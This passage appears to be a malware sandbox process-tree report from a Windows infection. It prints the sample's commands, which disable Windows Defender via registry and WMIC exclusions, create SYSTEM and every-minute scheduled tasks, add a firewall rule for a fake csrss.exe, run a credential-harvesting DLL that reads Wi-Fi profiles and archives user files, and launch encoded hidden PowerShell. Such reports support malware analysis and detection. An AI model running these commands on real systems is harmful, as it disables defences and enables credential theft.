        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:3936
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:4036
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:3224
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:280
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:3904
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:3720
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:3884
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:992
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:3904
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3152
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:1656
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\BwIdcxA.exe\" it /DLCdidcarz 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:3184
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:2536
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:2448
        
        C:\Users\Admin\Pictures\VRViOw5Z4pZPpRviZDGjjPxs.exe
        
        "C:\Users\Admin\Pictures\VRViOw5Z4pZPpRviZDGjjPxs.exe"
        7⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\7zS50FD.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:2696
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:448
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:1120
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:3624
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:4000
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:1456
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:3680
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4028
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:2792
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:3272
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:3452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3368
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:3668
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\wEeBLUP.exe\" it /hkKdidLTBl 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:3500
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:788
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:2548
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:3764
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2088 -s 676
        6⤵
        Loads dropped DLL
        
        PID:888
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        
        PID:2040
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        
        PID:2100
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 116
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2400
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:3248
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:3268
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:3372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\297530677122_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3704
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:3680
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        Loads dropped DLL
        
        PID:3208
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:3588
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        Executes dropped EXE
        
        PID:3544
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:3528
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        Executes dropped EXE
        
        PID:1600
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:3700
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        Executes dropped EXE
        
        PID:3724
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:1812
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:4032
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        
        PID:2136
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        
        PID:4072
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        
        PID:3092
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:4036
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        
        PID:3264
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        
        PID:3192
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        
        PID:3900
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:3268
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        Executes dropped EXE
        
        PID:3908
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:3236
      - C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe"
        6⤵
        Executes dropped EXE
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\u2ts.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2ts.0.exe"
        7⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\u2ts.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2ts.1.exe"
        7⤵
        
        PID:3200
      - C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe"
        6⤵
        Executes dropped EXE
        
        PID:3272
      - C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"
        6⤵
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"
        7⤵
        
        PID:3180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        8⤵
        
        PID:3600
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        9⤵
        Modifies Windows Firewall
        
        PID:3000
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        
        PID:3744
- - C:\Users\Admin\AppData\Local\Temp\1000020001\f445e8fddd.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\f445e8fddd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:1948
- - C:\Users\Admin\1000021002\bcaa5b1d77.exe
    "C:\Users\Admin\1000021002\bcaa5b1d77.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2572
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2468
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4799758,0x7fef4799768,0x7fef4799778
        5⤵
        
        PID:2480
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:2
        5⤵
        
        PID:2824
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:8
        5⤵
        
        PID:2948
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1548 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:8
        5⤵
        
        PID:1532
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:1
        5⤵
        
        PID:2808
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2224 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:1
        5⤵
        
        PID:1712
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1476 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:2
        5⤵
        
        PID:1788
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2504 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:1
        5⤵
        
        PID:2596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=1184,i,325015219404489419,14593833253385517707,131072 /prefetch:8
        5⤵
        
        PID:1560

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:696

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3736
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3472
- - C:\Windows\Temp\449643.exe
    "C:\Windows\Temp\449643.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3916

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:1300
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:1368

C:\Windows\system32\taskeng.exe
taskeng.exe {819FC41A-E072-4249-94F1-58082A5ED5F6} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
1⤵
PID:3148
- C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  2⤵
  PID:3708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1652
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:996
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2388
- C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  2⤵
  PID:2332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
